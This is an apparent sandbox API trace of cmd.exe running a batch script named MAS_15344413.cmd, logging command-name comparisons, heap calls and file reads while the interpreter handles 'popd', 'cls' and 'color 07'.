[0175.606] _wcsicmp (_String1="popd", _String2="CALL") returned 13 [0175.606] _wcsicmp (_String1="popd", _String2="VERIFY") returned -6 [0175.606] _wcsicmp (_String1="popd", _String2="VER") returned -6 [0175.606] _wcsicmp (_String1="popd", _String2="VOL") returned -6 [0175.606] _wcsicmp (_String1="popd", _String2="EXIT") returned 11 [0175.606] _wcsicmp (_String1="popd", _String2="SETLOCAL") returned -3 [0175.606] _wcsicmp (_String1="popd", _String2="ENDLOCAL") returned 11 [0175.606] _wcsicmp (_String1="popd", _String2="TITLE") returned -4 [0175.606] _wcsicmp (_String1="popd", _String2="START") returned -3 [0175.606] _wcsicmp (_String1="popd", _String2="DPATH") returned 12 [0175.606] _wcsicmp (_String1="popd", _String2="KEYS") returned 5 [0175.606] _wcsicmp (_String1="popd", _String2="MOVE") returned 3 [0175.606] _wcsicmp (_String1="popd", _String2="PUSHD") returned -6 [0175.607] _wcsicmp (_String1="popd", _String2="POPD") returned 0 [0175.607] GetProcessHeap () returned 0x19a8f1e0000 [0175.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1e5950 [0175.607] GetProcessHeap () returned 0x19a8f1e0000 [0175.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0175.607] GetProcessHeap () returned 0x19a8f1e0000 [0175.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0c30 [0175.607] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f9efe790 | out: lpBuffer="C:\\Windows\\Temp") returned 0xf [0175.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x43f9efe790, lpFilePart=0x43f9efe770 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efe770*="system32") returned 0x13 [0175.607] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0175.607] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x43f9efe4a0 | out: lpFindFileData=0x43f9efe4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x19a8f1f8a60 [0175.607] FindClose (in: hFindFile=0x19a8f1f8a60 | out: hFindFile=0x19a8f1f8a60) returned 1 [0175.608] memcpy (in: _Dst=0x43f9efe796, _Src=0x43f9efe4cc, _Size=0xe | out: _Dst=0x43f9efe796) returned 0x43f9efe796 [0175.608] FindFirstFileW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x43f9efe4a0 | out: lpFindFileData=0x43f9efe4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x19a8f1f8940 [0175.608] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0175.608] memcpy (in: _Dst=0x43f9efe7a6, _Src=0x43f9efe4cc, _Size=0x10 | out: _Dst=0x43f9efe7a6) returned 0x43f9efe7a6 [0175.608] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0175.608] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0175.608] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0175.608] GetProcessHeap () returned 0x19a8f1e0000 [0175.609] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef690) returned 1 [0175.609] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0175.609] GetProcessHeap () returned 0x19a8f1e0000 [0175.609] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb3c) returned 0x19a8f1eeb50 [0175.609] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xb3c | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0175.609] FreeEnvironmentStringsA (penv="=") returned 1 [0175.609] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0175.609] GetProcessHeap () returned 0x19a8f1e0000 [0175.610] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0c30) returned 1 [0175.610] GetProcessHeap () returned 0x19a8f1e0000 [0175.610] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0175.610] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.611] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.612] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.612] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.613] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.613] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.614] SetConsoleInputExeNameW () returned 0x1 [0175.614] GetConsoleOutputCP () returned 0x1b5 [0175.614] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.614] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.615] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.615] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.615] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.615] SetFilePointer (in: hFile=0x94, lDistanceToMove=2741, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab5 [0175.615] GetProcessHeap () returned 0x19a8f1e0000 [0175.615] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.615] GetProcessHeap () returned 0x19a8f1e0000 [0175.615] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.615] GetProcessHeap () returned 0x19a8f1e0000 [0175.615] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0175.615] GetProcessHeap () returned 0x19a8f1e0000 [0175.616] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0175.616] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.616] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab5 [0175.616] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.616] SetFilePointer (in: hFile=0x94, lDistanceToMove=2743, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab7 [0175.616] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\npd\r\nb\r\n0.0.1 -n 6 >nul\r\nhas LF line ending issue or an empty line at the end of the script is missing.\r\n================================\r\n") returned 2 [0175.616] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.616] GetFileType (hFile=0x94) returned 0x1 [0175.616] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.616] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab7 [0175.617] GetProcessHeap () returned 0x19a8f1e0000 [0175.617] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.617] GetProcessHeap () returned 0x19a8f1e0000 [0175.617] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.617] _tell (_FileHandle=3) returned 2743 [0175.617] _close (_FileHandle=3) returned 0 [0175.617] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.617] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.618] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.618] SetFilePointer (in: hFile=0x94, lDistanceToMove=2743, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab7 [0175.618] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.618] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab7 [0175.618] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.618] SetFilePointer (in: hFile=0x94, lDistanceToMove=2883, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb43 [0175.618] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0175.618] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.618] GetFileType (hFile=0x94) returned 0x1 [0175.618] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.618] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb43 [0175.618] GetProcessHeap () returned 0x19a8f1e0000 [0175.618] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.618] GetProcessHeap () returned 0x19a8f1e0000 [0175.619] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.619] _tell (_FileHandle=3) returned 2883 [0175.619] _close (_FileHandle=3) returned 0 [0175.619] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.619] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.619] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.619] SetFilePointer (in: hFile=0x94, lDistanceToMove=2883, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb43 [0175.620] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.620] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb43 [0175.620] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.620] SetFilePointer (in: hFile=0x94, lDistanceToMove=2885, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb45 [0175.620] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0175.620] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.620] GetFileType (hFile=0x94) returned 0x1 [0175.620] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.620] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb45 [0175.620] GetProcessHeap () returned 0x19a8f1e0000 [0175.620] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.620] GetProcessHeap () returned 0x19a8f1e0000 [0175.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.621] _tell (_FileHandle=3) returned 2885 [0175.621] _close (_FileHandle=3) returned 0 [0175.621] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.621] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.621] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.621] SetFilePointer (in: hFile=0x94, lDistanceToMove=2885, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb45 [0175.621] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.622] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb45 [0175.622] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.622] SetFilePointer (in: hFile=0x94, lDistanceToMove=2890, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4a [0175.622] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="cls\r\n=====================================================================================================================================\r\n") returned 5 [0175.622] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.622] GetFileType (hFile=0x94) returned 0x1 [0175.622] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.622] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4a [0175.622] GetProcessHeap () returned 0x19a8f1e0000 [0175.622] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.622] GetProcessHeap () returned 0x19a8f1e0000 [0175.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.623] _wcsicmp (_String1="cls", _String2=")") returned 58 [0175.623] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0175.623] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0175.623] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0175.623] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0175.623] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0175.623] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0175.623] GetProcessHeap () returned 0x19a8f1e0000 [0175.623] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0175.623] GetProcessHeap () returned 0x19a8f1e0000 [0175.623] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0175.623] _tell (_FileHandle=3) returned 2890 [0175.623] _close (_FileHandle=3) returned 0 [0175.624] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0175.624] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0175.624] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0175.624] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0175.624] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0175.624] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0175.624] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0175.624] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0175.624] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0175.624] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0175.624] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0175.624] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0175.624] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0175.624] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0175.624] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0175.624] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0175.624] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0175.624] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0175.624] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0175.625] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0175.625] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0175.625] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0175.625] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0175.625] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.626] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0175.626] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0175.626] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0175.626] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0175.626] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0175.626] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0175.626] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0175.626] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0175.626] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0175.626] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0175.626] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0175.626] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0175.626] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0175.626] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0175.626] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0175.626] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0175.626] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0175.626] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0175.626] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0175.626] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0175.626] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0175.626] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0175.627] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0175.627] GetProcessHeap () returned 0x19a8f1e0000 [0175.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecb60 [0175.627] GetProcessHeap () returned 0x19a8f1e0000 [0175.627] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecce0 [0175.627] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.627] GetFileType (hFile=0x24) returned 0x2 [0175.627] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.627] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe9a8 | out: lpMode=0x43f9efe9a8) returned 1 [0175.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.629] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x43f9efe9e0 | out: lpConsoleScreenBufferInfo=0x43f9efe9e0) returned 1 [0175.629] ScrollConsoleScreenBufferW (hConsoleOutput=0x24, lpScrollRectangle=0x43f9efe9d8, lpClipRectangle=0x0, dwDestinationOrigin=0xdcd70000, lpFill=0x43f9efe9d4) returned 1 [0175.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.635] SetConsoleCursorPosition (hConsoleOutput=0x24, dwCursorPosition=0x0) returned 1 [0175.636] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.636] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.636] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.636] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.637] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.637] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.637] SetConsoleInputExeNameW () returned 0x1 [0175.637] GetConsoleOutputCP () returned 0x1b5 [0175.638] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.638] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.638] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.639] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.639] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.639] SetFilePointer (in: hFile=0x94, lDistanceToMove=2890, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4a [0175.639] GetProcessHeap () returned 0x19a8f1e0000 [0175.639] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecce0) returned 1 [0175.639] GetProcessHeap () returned 0x19a8f1e0000 [0175.639] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb60) returned 1 [0175.639] GetProcessHeap () returned 0x19a8f1e0000 [0175.639] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.639] GetProcessHeap () returned 0x19a8f1e0000 [0175.640] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0175.640] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.640] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4a [0175.640] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.640] SetFilePointer (in: hFile=0x94, lDistanceToMove=2900, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb54 [0175.640] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="color 07\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="color 07\r\n================================================================================================================================\r\n") returned 10 [0175.640] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.640] GetFileType (hFile=0x94) returned 0x1 [0175.640] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.640] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb54 [0175.640] GetProcessHeap () returned 0x19a8f1e0000 [0175.641] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fdd10 [0175.641] GetProcessHeap () returned 0x19a8f1e0000 [0175.641] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fdd10) returned 1 [0175.644] _wcsicmp (_String1="color", _String2=")") returned 58 [0175.644] _wcsicmp (_String1="FOR", _String2="color") returned 3 [0175.644] _wcsicmp (_String1="FOR/?", _String2="color") returned 3 [0175.644] _wcsicmp (_String1="IF", _String2="color") returned 6 [0175.644] _wcsicmp (_String1="IF/?", _String2="color") returned 6 [0175.644] _wcsicmp (_String1="REM", _String2="color") returned 15 [0175.644] _wcsicmp (_String1="REM/?", _String2="color") returned 15 [0175.644] GetProcessHeap () returned 0x19a8f1e0000 [0175.644] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0175.644] GetProcessHeap () returned 0x19a8f1e0000 [0175.644] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0175.644] GetProcessHeap () returned 0x19a8f1e0000 [0175.644] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0175.644] _tell (_FileHandle=3) returned 2900 [0175.645] _close (_FileHandle=3) returned 0 [0175.645] _wcsicmp (_String1="color", _String2="DIR") returned -1 [0175.645] _wcsicmp (_String1="color", _String2="ERASE") returned -2 [0175.645] _wcsicmp (_String1="color", _String2="DEL") returned -1 [0175.645] _wcsicmp (_String1="color", _String2="TYPE") returned -17 [0175.645] _wcsicmp (_String1="color", _String2="COPY") returned -4 [0175.645] _wcsicmp (_String1="color", _String2="CD") returned 11 [0175.645] _wcsicmp (_String1="color", _String2="CHDIR") returned 7 [0175.645] _wcsicmp (_String1="color", _String2="RENAME") returned -15 [0175.645] _wcsicmp (_String1="color", _String2="REN") returned -15 [0175.645] _wcsicmp (_String1="color", _String2="ECHO") returned -2 [0175.645] _wcsicmp (_String1="color", _String2="SET") returned -16 [0175.645] _wcsicmp (_String1="color", _String2="PAUSE") returned -13 [0175.645] _wcsicmp (_String1="color", _String2="DATE") returned -1 [0175.645] _wcsicmp (_String1="color", _String2="TIME") returned -17 [0175.645] _wcsicmp (_String1="color", _String2="PROMPT") returned -13 [0175.645] _wcsicmp (_String1="color", _String2="MD") returned -10 [0175.645] _wcsicmp (_String1="color", _String2="MKDIR") returned -10 [0175.645] _wcsicmp (_String1="color", _String2="RD") returned -15 [0175.645] _wcsicmp (_String1="color", _String2="RMDIR") returned -15 [0175.646] _wcsicmp (_String1="color", _String2="PATH") returned -13 [0175.646] _wcsicmp (_String1="color", _String2="GOTO") returned -4 [0175.646] _wcsicmp (_String1="color", _String2="SHIFT") returned -16 [0175.646] _wcsicmp (_String1="color", _String2="CLS") returned 3 [0175.646] _wcsicmp (_String1="color", _String2="CALL") returned 14 [0175.646] _wcsicmp (_String1="color", _String2="VERIFY") returned -19 